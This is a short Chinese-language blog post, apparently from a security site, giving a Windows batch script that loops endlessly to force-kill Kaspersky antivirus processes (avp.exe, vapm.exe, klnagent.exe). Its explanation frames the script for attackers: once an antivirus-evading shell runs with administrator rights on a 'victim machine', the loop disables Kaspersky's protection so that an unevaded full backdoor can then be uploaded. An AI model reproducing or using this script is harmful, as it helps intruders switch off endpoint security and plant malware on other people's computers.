管理员权限杀卡巴斯基进程

on under web
1 minute read

Code

:start
taskkill /F /IM avp.exe
taskkill /F /IM vapm.exe
taskkill /F /IM klnagent.exe
goto start

About

可用于一个管理员权限运行的免杀shell中执行这个批处理文件,运行后会不断强制杀死kaspersky的进程,但不会彻底杀掉,因为kaspersky会自动复活,但上面这个无限循环可使kaspersky的保护功能失效.可用上的场景:

  • 1.受害机当前用户为administrator
  • 2.受害机运行了一个免杀的shell(功能有限的shell,功能越少越好免杀),这个shell只有执行命令的功能
  • 3.通过shell运行上面的批处理”杀死“kaspersky后再上大马,大马可不用免杀
kaspersky
Since March 2016 the 3xp10it.cc has been running
home
github
search
archive
category